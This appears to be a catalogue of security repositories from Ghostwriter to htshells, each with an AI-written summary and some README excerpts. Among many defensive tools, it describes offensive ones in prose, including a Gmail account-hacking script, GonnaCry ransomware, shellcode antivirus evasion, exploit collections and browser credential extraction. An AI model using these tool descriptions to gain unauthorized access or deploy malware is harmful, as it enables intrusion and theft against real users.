Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Ghostwriter is an open-source platform that streamlines offensive security operations by facilitating report writing, asset tracking, and assessment management. Key features include a robust reporting engine with customizable templates, role-based access controls, and integrations with tools like Mythic C2 and Cobalt Strike for automatic activity logging. The platform enhances collaboration among red teams and consultants by providing a centralized environment to manage client information and generate comprehensive reports in various formats.

GHunt

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: GHunt is an offensive Google framework focused on OSINT, enabling users to extract information using various modules related to Google services. Key features include a command-line interface, asynchronous processing, JSON export capabilities, and a browser extension for easier login. The tool is designed for security assessments, data gathering, and enhancing investigative workflows linked to Google accounts and assets.

README

🌐 GHunt Online version : https://osint.industries

🐍 Now Python 3.13 compatible !

git-hound

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: GitHound is a secret detection tool designed to identify exposed API keys, secrets, and credentials across GitHub repositories using advanced pattern matching and commit-history analysis. Its notable features include global GitHub search capabilities, smart API key detection mechanisms, and the ability to visualize results in real-time through the GitHound Explore dashboard. This tool is particularly useful for security professionals in corporate environments and bug bounty hunters seeking to uncover sensitive information that may lead to vulnerabilities.

GitFive

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: GitFive is an OSINT tool designed for investigating GitHub profiles, enabling users to track username histories, variations, and associated email addresses. Key features include the ability to discover GitHub accounts from lists of emails, analyze repositories, and generate possible email combinations, all while operating efficiently within GitHub’s API rate limits. The tool also supports features like SSH key dumping and JSON exports for ease of data handling.

README

GitGot

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: GitGot is a semi-automated tool designed for the quick identification of sensitive information and secrets stored in public GitHub repositories. It leverages user feedback to refine search results, allowing for the dynamic creation of blacklists based on filenames, repository names, or file content matches. Notable features include session persistence, the ability to query GitHub Gists or self-hosted instances, and support for advanced search syntax using the GitHub Search API.

gitGraber

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: gitGraber is a real-time monitoring tool designed to detect sensitive data leaks across GitHub for various online services, including AWS and Facebook. Its primary use case is to identify and notify users of potential API key exposures through Slack, Discord, or directly in the command line, while minimizing false positives with precise regex patterns. Notable features include configurable keyword searches, automated monitoring through cron jobs, and a dynamic wordlist that adapts to discovered filenames.

github-search

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: GitHub Search is a collection of tools designed to perform advanced searches on GitHub repositories using bash, Python, and PHP. It primarily facilitates users in conducting tailored searches across GitHub by leveraging personal access tokens for authentication, enhancing the search capability and efficiency. Notable features include support for multiple scripting languages and a straightforward setup process through environment variable configuration or a tokens file.

README

github-search

A collection of tools to perform searches on GitHub.

github-subdomains

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The github-subdomains tool is designed to search GitHub for subdomains related to a specified domain and parse the search results efficiently. Key features include the ability to use multiple GitHub tokens to manage rate limits, an option for extended searches, and customizable output formats for the collected subdomains. This tool is particularly useful for security researchers and analysts looking to identify exposed subdomains for threat assessment or reconnaissance purposes.

gitjacker

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Gitjacker is a tool designed to retrieve git repositories and their contents from web servers where the .git directory has been unintentionally exposed. It effectively extracts repository data even when directory listings are disabled, making it suitable for educational purposes and penetration testing. Notable features include ease of installation via a simple script and the ability to operate in scenarios where access to traditional repository resources is restricted.

gitleaks

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Gitleaks is a tool designed for the detection of sensitive information, such as passwords, API keys, and tokens, within Git repositories and other files. Its primary use case is to identify and prevent the accidental exposure of secrets in code, and it offers notable features such as integration with GitHub Actions and pre-commit hooks for continuous monitoring. Additionally, Gitleaks utilizes a robust detection engine based on regular expressions to analyze codebases efficiently.

globalthreatmap

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The Global Threat & Event Intelligence Map is a real-time situational awareness platform designed for visualizing security events, geopolitical developments, and threat indicators on an interactive map. Key features include a customizable event mapping system, a filterable event feed, and detailed intelligence dossiers on various actors, along with visualization layers for military bases. This tool serves as an OSINT command center, aggregating and synthesizing global conflict data for enhanced situational analysis.

Gmail-Hack

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Gmail-Hack is a Python-based tool designed for unauthorized access to Gmail accounts, primarily focused on users operating in Termux or Linux environments. It features a straightforward installation process and is intended for educational purposes, with caveats regarding its ethical use. Notably, the tool claims to facilitate hacking actions with minimal setup time, emphasizing its ease of use for individuals familiar with command-line interfaces.

README

Gmail-Hack

Easy gmail hacking in python

Я не несу ответственности за ваши действия. Скачивая программное обеспечение из этого репозитория, вы соглашаетесь с лицензией.

go-shellcode

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The go-shellcode tool enables users to execute shellcode directly from memory as a standalone process, aiming to circumvent antivirus detection. Its primary use case involves running custom shellcode for penetration testing or exploitation purposes, leveraging features like shellcode size handling via batch scripts and a recommendation for binary obfuscation using the garble tool. The tool requires manual architecture specification and supports 64-bit shellcode execution while providing instructions for building and compressing the resulting binary.

go-whatsapp

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The go-whatsapp package offers a Go interface for interacting with the WhatsApp Web API, enabling developers to integrate WhatsApp functionalities in their applications. Its primary use case is to facilitate the sending and receiving of messages, management of user sessions, and handling various types of media messages through a websocket connection. Notable features include session restoration, customizable message handlers for different message types, and the ability to send contact information in the vCard format; however, the package is not actively maintained and may soon become obsolete due to WhatsApp’s evolving architecture.

goblin

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: libgoblin is a versatile Rust library for binary parsing, loading, and analysis, supporting multiple formats including ELF, Mach-O, and PE across both 32-bit and 64-bit architectures. Its notable features include zero-copy parsing, cross-platform capabilities, endian-awareness, and extensive configurability, allowing users to adapt it to various binary analysis tasks while maintaining a lightweight and efficient footprint. The library is designed for use cases ranging from compiler development to binary analysis tools, making it a comprehensive solution for developers working with binary data.

Goby

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Goby is a network security assessment tool designed for efficient vulnerability scanning and comprehensive attack surface analysis of target enterprises. It features over 100,000 rule recognition engines and 200 protocol recognition engines, facilitating identification of various network and software vulnerabilities, along with access to preset account information for more than 1,000 devices. Additionally, Goby supports cross-platform functionality on Windows, MacOS, and Linux, and employs a user-friendly interface built with Electron and Vue.

GobyVuls

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: GobyVuls is a collection of exploitation scripts specifically designed for vulnerabilities identified by the Goby scanning tool. The primary use case is to facilitate the exploitation of detected vulnerabilities, allowing users to perform actions such as command execution or establishing reverse shells. Notable features include a user-friendly interface for scanning and verification, as well as a collaborative framework for contributing new vulnerabilities and enhancing existing exploitation methods.

README

GobyVuls

Vulnerabilities of Goby supported with exploitation.

gogo

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: gogo is a versatile network scanning tool designed for both active and passive fingerprinting, featuring customizable port configurations and the extraction of key information such as titles and certificates through regex patterns. It supports the integration of Nuclei proof of concepts (POCs) and offers a heuristic scanning mode for improved performance with minimal resource usage, making it highly efficient for vulnerability detection. The tool is entirely written in Go, ensuring compatibility with minimal dependencies across various operating systems, including legacy versions like Windows 2003.

golang-tls

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The golang-tls repository provides tools for generating TLS certificates and creating simple HTTPS/TLS servers and clients using Go. It supports both RSA and ECDSA key generation and facilitates the creation of self-signed certificates. Notable features include configurations for achieving optimal security scores with SSL Labs and the implementation of basic server-client communication over secure connections.

README

Generate private key (.key)

# Key considerations for algorithm "RSA" ≥ 2048-bit
openssl genrsa -out server.key 2048

# Key considerations for algorithm "ECDSA" (X25519 || ≥ secp384r1)
# https://safecurves.cr.yp.to/
# List ECDSA the supported curves (openssl ecparam -list_curves)
openssl ecparam -genkey -name secp384r1 -out server.key

Generation of self-signed(x509) public key (PEM-encodings `.pem`|`.crt`) based on the private (`.key`)

openssl req -new -x509 -sha256 -key server.key -out server.crt -days 3650

Simple Golang HTTPS/TLS Server

package main

import (
 // "fmt"
 // "io"
 "net/http"
 "log"
)

func HelloServer(w http.ResponseWriter, req *http.Request) {
 w.Header().Set("Content-Type", "text/plain")
 w.Write([]byte("This is an example server.\n"))
 // fmt.Fprintf(w, "This is an example server.\n")
 // io.WriteString(w, "This is an example server.\n")
}

func main() {
 http.HandleFunc("/hello", HelloServer)
 err := http.ListenAndServeTLS(":443", "server.crt", "server.key", nil)
 if err != nil {
 log.Fatal("ListenAndServe: ", err)
 }
}

Hint: visit, please do not forget to use https begins, otherwise chrome will download a file as follows:

GonnaCry

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: GonnaCry is a Linux-based ransomware designed to encrypt user files using a robust AES-256-CBC encryption scheme, featuring per-file random AES keys and initialization vectors. Its primary use case is to serve as an educational tool for understanding malware, cryptography, and operating systems, with capabilities such as communicating with a server for key management, altering system wallpapers, and terminating database services. Notable features include a built-in decryptor and the use of RSA-2048 for secure key encryption, making it a comprehensive demonstration of ransomware mechanics.

Goohak

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: GooHak is an automated tool designed for launching Google hacking queries against specified target domains to uncover vulnerabilities and facilitate enumeration. Its primary use case is to streamline the process of gathering information through tailored search queries, leveraging Google’s search capabilities. Notable features include straightforward command-line usage and dependencies tailored for Linux environments.

README

GooHak

ABOUT:

Automatically launch google hacking queries against a target domain to find vulnerabilities and enumerate a target.

goscan

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: GoScan is an interactive network scanner client designed to automate and provide abstraction over nmap, facilitating host discovery, port scanning, and service enumeration. It is particularly suitable for use in CTFs, OSCP exams, or professional engagements, capable of maintaining scan state in an SQLite database, allowing for asynchronous results upload even in unstable network conditions. Notable features include service enumeration integration with additional tools such as EyeWitness and Hydra, real-time auto-completion, and support for importing data at various stages of the scanning process.

gosearch

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: GoSearch is an OSINT tool designed to automate the process of searching for online profiles associated with specific usernames, utilizing concurrency for efficiency. It integrates searches across multiple extensive databases, including 900,000 leaked credentials from HudsonRock and over 18 billion from BreachDirectory, enhancing its capability to detect compromised accounts. Notable features include the ability to filter results for accuracy with the --no-false-positives flag and the option to crack found password hashes using Weakpass, significantly boosting the tool’s effectiveness in cybersecurity investigations.

gosec

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: gosec is a security analysis tool designed to inspect Go source code for potential security vulnerabilities by scanning the Abstract Syntax Tree (AST) and Static Single Assignment (SSA) representation. It utilizes pattern-based rules, SSA-based analyzers, and taint analysis to identify common issues like SQL injection and XSS. Notable features include customizable rule selection, various output formats, and integration as a GitHub Action for continuous security monitoring.

README

gosec - Go Security Checker

Inspects source code for security problems by scanning the Go AST and SSA code representation.

gotestwaf

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: GoTestWAF is a versatile tool designed for simulating API and web application attacks, supporting a multitude of protocols like REST, GraphQL, and gRPC, among others. It evaluates the effectiveness of security solutions such as Web Application Firewalls and API gateways by generating malicious HTTP requests with encoded payloads, allowing for comprehensive security testing and reporting of vulnerabilities. Notable features include customizable payloads, diverse encoding options, and the ability to specify request placeholders for precise attack simulations.

GpgFrontend

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: GpgFrontend is a modern encryption tool that leverages GnuPG to facilitate easy and secure encryption and signing of texts and files across multiple platforms, including Windows, macOS, and Linux. Key features include a portable solution that can be run from a USB drive, flexible management of key databases, and a strong focus on user privacy through various safety measures. The tool also supports extensive module development, allowing for customizable user experiences and features.

gpt4free

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: GPT4Free (g4f) is a robust tool designed to streamline interactions with various accessible Large Language Models (LLMs) and media-generation models by providing a unified interface across multiple providers. It features local GUI support, OpenAI-compatible REST APIs, and clients in both Python and JavaScript, enhancing flexibility and ease of use for developers. Notably, it is community-driven, allowing customization and contribution to improve the platform further.

README

GPT4Free (g4f)

grapefruit

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Grapefruit is an open-source mobile security testing suite designed for runtime mobile application instrumentation, supporting both iOS and Android platforms through a web-based interface powered by Frida. It allows users to inspect, hook, and modify mobile apps with features including method hooking, cryptographic API interception, filesystem and SQLite database inspection, memory scanning, and real-time log monitoring. Additionally, it provides support for various frameworks like Flutter and React Native, as well as advanced analysis and decompilation capabilities for a comprehensive security assessment.

greenmask

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Greenmask is an open-source utility designed for logical database dumping, anonymization, and synthetic data generation, primarily targeting PostgreSQL with ongoing support for MySQL. It enables users to create smaller, referentially intact development databases while offering features such as deterministic transformations, dynamic parameters, and storage support for S3-compatible systems, ensuring flexibility and data integrity. Ideal for sanitizing sensitive data, backing up and restoring databases, and streamlining local development processes, Greenmask operates statelessly and produces outputs compatible with standard database tools.

GTFOBins.github.io

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: GTFOBins is a curated repository that catalogs Unix-like executables capable of circumventing local security restrictions in improperly configured systems. Its primary use case is to aid security professionals and penetration testers in identifying and exploiting misconfigurations. Notable features include a comprehensive database of binaries and detailed usage instructions for different scenarios.

README

GTFOBins

GTFOBins is a curated list of Unix-like executables that can be used to bypass local security restrictions in misconfigured systems.

guardian-cli

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Guardian is an AI-powered penetration testing automation platform designed for enterprise environments, integrating multiple AI providers with extensive security tools to perform intelligent and adaptive security assessments. It features a multi-agent architecture for strategic decision-making, 19 integrated security tools for thorough testing, and enhanced evidence capture for complete traceability of findings. Users must ensure authorized access before conducting tests, adhering to legal and ethical guidelines.

README

🔐 Guardian

AI-Powered Penetration Testing Automation Platform

h-encore

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: h-encore is a jailbreak tool for the PS Vita that enables kernel and user-mode modifications on firmware versions 3.65, 3.67, and 3.68. Its primary use case is to allow users to install plugins, run homebrew applications, and customize their device’s performance. Notable features include the ability to auto-exit the bootstrap menu, personalize savedata to remove trophy warnings, and a streamlined kernel ROP chain for enhanced stability and compatibility.

h2csmuggler

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: h2cSmuggler is a specialized tool that facilitates the smuggling of HTTP traffic past insecure proxy configurations by leveraging HTTP/2 cleartext (h2c) communications with compatible back-end servers. Its primary use case involves testing web servers for vulnerabilities related to improperly configured proxy_pass directives that could allow attackers to bypass access controls and proxy rules. Notable features include the ability to scan multiple endpoints concurrently, integration with popular security tools like Burp Suite, and a test environment for demonstration and experimentation with h2c smuggling techniques.

h8mail

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: h8mail is an email open-source intelligence (OSINT) and breach hunting tool designed to search for emails across various breach and reconnaissance services, including local database breaches. It features advanced capabilities such as regex-based email pattern matching, support for multiprocessed local searches, and integration with premium APIs for enhanced data retrieval. Additionally, it allows bulk file processing and the output of results in CSV or JSON format, making it highly versatile for cybersecurity professionals.

HaboMalHunter

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: HaboMalHunter is an automated malware analysis tool specifically designed for Linux ELF files, facilitating both static and dynamic analysis to aid security analysts. It efficiently extracts crucial features such as process behavior, file I/O, and network interactions, generating comprehensive reports on malicious activities. Notable features include detailed static analysis of file dependencies and strings, as well as dynamic tracking of execution timestamps, API calls, and syscall sequences.

README

HaboMalHunter: Habo Linux Malware Analysis System

hack-tools

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The “hack-tools” repository offers a comprehensive collection of cybersecurity tools including DOS, information gathering utilities, malware creation kits, and remote administration tools, catering to a wide audience from enthusiasts to professionals. Key features include multi-platform support for Windows and Linux, compatibility with several programming languages, and the availability of free tools; however, users are cautioned about the legal implications and varying development statuses of the tools provided.

README

hackbar2.1.3

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Hackbar 2.1.3 is a Firefox extension designed for penetration testing that facilitates web application security assessments by allowing users to manipulate HTTP requests. The tool enables users to load specific payloads and automate tasks, making it suitable for security professionals. Notable features include compatibility with various versions of browsers, and updates that offer newer functionalities and security patches.

README

hackbar2.1.3
firefox hackbar收费前的残留版本
使用方法
打开firefox的插件目录
然后点这里
加载{4c98c9c7-fc13-4622-b08a-a18923469c1c}.xpi 即可
一定记住要关闭插件的自动更新！！！，否则浏览器会自动更新插件到收费版本！！!
设置方法如下图所示:

HackBrowserData

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: HackBrowserData is a command-line utility designed for decrypting and exporting sensitive data, such as passwords, cookies, and browsing history, from various popular web browsers on Windows, macOS, and Linux. Its notable features include support for the latest encryption standards, like AES-256-CBC for Firefox 144 and beyond, and comprehensive compatibility with a wide range of browsers including Google Chrome, Microsoft Edge, and Opera. The tool emphasizes its intended use for security research while disclaiming legal responsibilities associated with its application.

hackdroid

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: HackDroid is a comprehensive collection of penetration testing and security-related applications tailored for Android devices. It organizes applications into diverse categories, including forensics, networking, and cryptography, to facilitate easy access and download, while emphasizing the necessity of root permissions and ethical use cases. Notable features include a wide range of tools for various hacking and security tasks, and guidance for use on secondary devices to mitigate risks.

README

Hacker-Roadmap

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The Hacker Roadmap is a comprehensive guide designed to assist individuals at various stages of their cybersecurity journey, from hobbyists to those pursuing certifications or degrees. It outlines multiple pathways tailored to specific goals, such as becoming a bug bounty hunter or quickly entering the cybersecurity workforce. Notable features include structured roadmaps, visual resources, and links to additional hacking aids for both red and blue team strategies.

README

Hacker Roadmap

Are you ready to embark on an electrifying journey into the depths of cybersecurity? Whether you’re eyeing a prestigious certification, gearing up for a Bachelor’s degree, or simply indulging your insatiable curiosity, this roadmap is your ultimate guide to becoming a true hacking virtuoso. But before we dive into the nitty-gritty, let’s set the stage. Are you in it for the thrill, the challenge, or perhaps envisioning a career at the cutting edge of cyber defense? Your motivations will shape the path ahead, so let’s chart a course tailored precisely to your aspirations.

hackerpro

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: HackerPro is a comprehensive pentesting toolkit designed for security professionals, offering a wide array of tools for information gathering, password attacks, wireless testing, web hacking, and post-exploitation. Notable features include Nmap for network scanning, sqlmap for SQL injection, and a suite of tools for scanning and exploiting web applications. This tool facilitates multi-faceted penetration testing, making it essential for those engaged in cybersecurity assessments.

README

HackGpt

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: HackGPT Enterprise is an AI-powered penetration testing platform tailored for enterprise security teams, designed to deliver comprehensive cybersecurity assessments through its advanced AI and machine learning capabilities. Key features include multi-model support for AI engines, automated reporting, robust compliance frameworks, and a cloud-native microservices architecture that enhances performance and scalability. Its tools for zero-day detection, risk intelligence, and extensive reporting ensure that organizations maintain a proactive stance against security threats.

hacking-online-games

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The “hacking-online-games” repository serves as a comprehensive compilation of tutorials and resources focused on hacking online games, including techniques for reverse engineering game clients and decrypting network protocols. It emphasizes the community-driven aspect of sharing knowledge and resources, inviting contributions and updates from users. Notably, it includes links to articles, presentations, and discussions that provide insights into various methods and legal considerations related to game hacking.

README

This repo is sponsored by GuidedHacking.com!

The Ultimate Online Game Hacking Resource

A curated list of tutorials/resources for hacking online games!

hacking-resources

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The Lifka/hacking-resources repository is a curated collection of hacking utilities and cheat sheets, aimed at assisting cybersecurity professionals and enthusiasts in their studies. It includes a variety of resources such as tools, OS distributions, tutorials, and specific cheat sheets for cloud, web, network, and system hacking. Notable features involve a comprehensive index and contributions from the community, facilitating an ongoing accumulation of valuable cybersecurity knowledge.

README

Hacking resources and cheat sheets

Hacking-Tools

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Hacking-Tools is a curated collection of penetration testing and ethical hacking utilities, including essential tools from Kali Linux. It is organized into categories such as information gathering, vulnerability analysis, and exploitation tools, facilitating easy navigation and use. Notable features include a featured tool, BugBoard, designed to automate vulnerability detection for bug bounty hunters and security researchers.

README

Hacking-Tools

A curated list of penetration testing and ethical hacking tools, organized by category. This collection includes Kali Linux tools and other notable utilities.

Hacking-Windows

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Hacking Windows is a comprehensive resource that provides insights into reverse engineering and hacking techniques specifically for Windows applications using Assembly language. It includes practical examples, tutorials, and chapters dedicated to debugging and analyzing various Windows API functions in both x86 and x64 architectures. Notable features include accessible self-study material, a free downloadable book, and hands-on exercises focused on real-world programming scenarios.

README

FREE Reverse Engineering Self-Study Course HERE

Hacking Windows

The book and code repo for the FREE Hacking Windows book by Kevin Thomas.

hackingBuddyGPT

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: HackingBuddyGPT is a tool designed to assist security researchers in leveraging large language models (LLMs) for discovering new attack vectors, enabling efficient penetration testing and security assessments in 50 lines of code or less. Notable features include support for SSH connections to remote targets and local shell execution, enhancing testing capabilities while maintaining awareness of potential risks to live environments. The framework also provides reusable benchmarks for Linux privilege escalation and comparative analyses of multiple LLMs to facilitate optimal usage in security tasks.

HackTools

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: HackTools is an all-in-one browser extension designed for offensive security professionals to facilitate web application penetration testing. It consolidates numerous penetration testing tools, including dynamic reverse shell generators, XSS payloads, and SQL injection payloads, allowing users to access critical functions quickly through a user-friendly command palette. The extension aims to enhance efficiency by eliminating the need to search for payloads across various platforms, all accessible within the browser’s DevTools environment.

HackVault

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: HackVault is a container repository designed for both defensive and offensive hacking tools. Its primary use case is to centralize and share various hacking utilities, which are intended to be continuously updated with new content over time. Notable features include a structured Wiki section for detailed information and ongoing additions to its arsenal of tools.

README

HackVault

This is a container repository for my defensive/offensive hacks. Go check the Wiki section for more information! Ideally, it’d be continually updated with new interesting stuff over time!

hal

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: HAL is a sophisticated framework designed for netlist reverse engineering and manipulation, allowing users to parse and analyze netlists from various hardware sources, such as FPGAs and ASICs, into a graph-based representation. Key features include high performance through an optimized C++ core, flexibility via Python bindings, a modular plugin system for extended functionality, and a rich GUI for visual inspection and interactive analysis. The tool aims to serve as a common baseline for researchers and analysts in the field of hardware reverse engineering, facilitating reproducibility and efficiency in research efforts.

hardening

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Hardening Ubuntu. Systemd edition.

Hardening Ubuntu. Systemd edition.

harpoon

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Harpoon is a command-line interface (CLI) tool designed for open-source intelligence (OSINT) and threat intelligence gathering. Its primary use case involves extracting comprehensive data from multiple security-related APIs, such as those for IP addresses, ASN queries, and domain information, through a range of built-in plugins. Notable features include support for multiple data sources, configurable API keys, and the ability to update the tool seamlessly for ongoing intelligence needs.

heap-viewer

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: HeapViewer is an IDA Pro plugin designed for analyzing heap memory, particularly for exploit development focusing on the glibc malloc implementation (ptmalloc2). Notable features include heap tracing for memory allocation functions, detection of overlaps and double-frees, visualization tools, chunk and arena information, and various utilities for manipulating and understanding heap structures. This tool aids in the identification of vulnerabilities related to memory management in software applications.

README

HeapViewer

hermes-dec

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: hermes-dec is a reverse-engineering tool designed for disassembling and decompiling React Native applications that utilize the Hermes VM bytecode (HBC) format. Its primary use case is to transform Hermes bytecode files into human-readable formats, enabling analysis and understanding of the JavaScript code within mobile apps. Notable features include the ability to parse Hermes file headers, disassemble bytecode into intermediate representations, and decompile bytecode into pseudo-code, facilitating the examination of React Native applications.

Heroinn

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Heroinn is a cross-platform command-and-control (C2) and post-exploitation framework developed in Rust, designed primarily for research and educational purposes. Notable features include a graphical user interface (GUI), an interactive PTY shell, system information collection, file management with support for large files and resuming broken transfers, and compatibility with multiple operating systems including Windows, Linux, BSD, and macOS, leveraging various communication protocols such as TCP, HTTP, and reliable UDP.

herpaderping

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Herpaderping is a process obfuscation tool that manipulates the content of a file on disk after it has been mapped for execution, thereby misleading security products and the operating system about the actual process being run. Its primary use case is to facilitate stealthy execution of binaries by exploiting the timing of process creation callbacks and on-write scanning mechanisms, allowing an actor to modify the file after mapping but before the process starts. Notable features include the ability to remain undetected during file inspections and the execution of a binary while obscuring its original content through a specific workflow of creating, mapping, modifying, and executing targets.

hexstrike-ai

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: HexStrike AI is an advanced penetration testing platform that integrates over 150 security tools and more than 12 autonomous AI agents for automated cybersecurity assessment. Its primary use case focuses on cybersecurity automation, employing intelligent decision-making and vulnerability intelligence to optimize attack strategies and resource management. Notable features include real-time dashboards, progress visualization, and a multi-agent architecture that facilitates comprehensive penetration testing and threat analysis.

README

HexStrike AI MCP Agents v6.0

AI-Powered MCP Cybersecurity Automation Platform

HexWalk

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: HexWalk is a cross-platform hex editor, viewer, and analyzer that facilitates in-depth binary file examination. Its primary use case is for advanced binary analysis, featuring capabilities such as advanced pattern searching, entropy analysis, disassembly for multiple architectures, and integration with Binwalk for firmware analysis. Notable features include a hash calculator, byte pattern recognition for header parsing, and a comprehensive diff analysis tool, making it suitable for security researchers and developers working with binary data.

hidden

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Hidden is a Windows driver designed for reverse engineering and research purposes, enabling users to conceal specific environmental indicators on their machines, such as debugging tools and virtual machine infrastructure. It offers advanced features to hide registry keys, files, directories, and processes, while providing a usermode interface through a library and command-line interface for comprehensive management capabilities. Notably, it includes the functionality to protect specific processes and exclude others from hiding features, all compatible with Windows Vista and later versions.

hollows_hunter

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Hollows Hunter is a command-line tool designed to identify and dump potentially malicious implants in processes by utilizing the PE-sieve passive memory scanner. Its primary use case includes scanning processes based on various criteria, such as process name and creation time, and it offers capabilities for continuous memory scanning and ETW listening. Notable features include the ability to scan all processes if no specific targets are specified, and support for multiple input criteria for enhanced targeting.

HolyTips

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: HolyTips is a comprehensive repository that provides a collection of notes, checklists, and writeups focused on bug bounty hunting and web application security. Its primary use case is to serve as a resource for security researchers and ethical hackers, offering organized information that aids in identifying vulnerabilities. Notable features include structured content that facilitates quick reference and learning in the field of web security assessments.

README

HolyTips

A Collection of Notes, Checklists, Writeups on Bug Bounty Hunting and Web Application Security.

honeypots

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Qeeqbox/honeypots is a versatile package containing 30 customizable honeypots designed for monitoring network traffic, bot activities, and credential harvesting. It features non-blocking responses, easy setup and customization, and supports logging to various outputs, including Postgres databases, terminal, and Syslog. The tool encapsulates multiple protocols like HTTP, FTP, SSH, and more, facilitating quick deployment of multiple honeypots for enhanced threat detection.

README

30 low-high level honeypots in a single PyPI package for monitoring network traffic, bots activities, and username \ password credentials.

HookCase

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: HookCase is a powerful debugging and reverse engineering tool for macOS that enhances the capabilities of Apple’s DYLD_INSERT_LIBRARIES. It allows users to hook methods in any module, including non-exported functions, and can target both parent and child processes simultaneously. Key features include support for watchpoints and the ability to bypass Apple’s restrictions on DYLD_INSERT_LIBRARIES, making it suitable for working with applications that have entitlements.

README

HookCase

HookCase is a tool for debugging and reverse engineering applications on macOS (aka OS X), and the operating system itself. It re-implements and extends Apple’s DYLD_INSERT_LIBRARIES functionality. It can be used to hook any method in any module (even non-exported ones, and even those that don’t have an entry in their own module’s symbol table). In a single operation, it can be applied to a parent process and all its child processes, whether or not the child processes inherit their parent’s environment. It supports watchpoints. So HookCase is considerably more powerful than DYLD_INSERT_LIBRARIES. It also doesn’t have the restrictions Apple has placed on DYLD_INSERT_LIBRARIES. So, for example, HookCase can be used with applications that have entitlements. HookCase runs on OS X 10.9 (Mavericks) through macOS 26 (Tahoe).

HostHunter

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: HostHunter is a Python-based tool designed for the discovery and extraction of hostnames linked to specified IPv4 or IPv6 addresses, utilizing OSINT and active reconnaissance methods. It generates comprehensive reports in various formats, including CSV and Nessus, and features capabilities like SSL certificate extraction, hostname validation, and the ability to capture screenshots of target applications. This tool is particularly beneficial for organizations aiming to assess their attack surface effectively.

houdini

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: HOUDINI is a comprehensive collection of Docker images designed for network intrusion testing, facilitating offensive security practices. It not only provides extensive listings of tools but also includes pre-defined docker run commands and cheatsheets for ease of use. Additionally, the repository encourages community contributions to expand its toolset, enhancing collaborative development in network security.

README

🐳 HOUDINI: Hundreds of Offensive and Useful Docker Images for Network Intrusion

HOUDINI is a curated list of Network Security related Docker Images for Network Intrusion purposes. A lot of images are created and kept updated through our RAUDI repository. Pretty dope, eh?

hrtng

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The hrtng IDA plugin provides a suite of tools designed to enhance the reverse engineering process within the IDA Pro environment, specifically leveraging the Hex-Rays decompiler. Its notable features include automation of variable renaming, interactive pseudocode transformations, various decryption capabilities, and assistance with obfuscated code analysis, all aimed at improving the efficiency and accuracy of binary analysis tasks. The plugin integrates seamlessly into IDA’s existing functionality, offering a structured approach to handling complex code scenarios.

htrace.sh

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: htrace.sh is a shell script designed for troubleshooting and profiling HTTP/HTTPS communications, serving as a wrapper for various open-source security tools. Its primary use case includes diagnosing web application vulnerabilities, analyzing SSL configurations, and extracting response headers and body content through an array of customizable parameters and options. Notable features include the ability to integrate with tools such as testssl, Mozilla’s Observatory, and Nmap’s NSE for comprehensive security assessments.

htshells

Mon, 30 Mar 2026 00:00:00 +0000

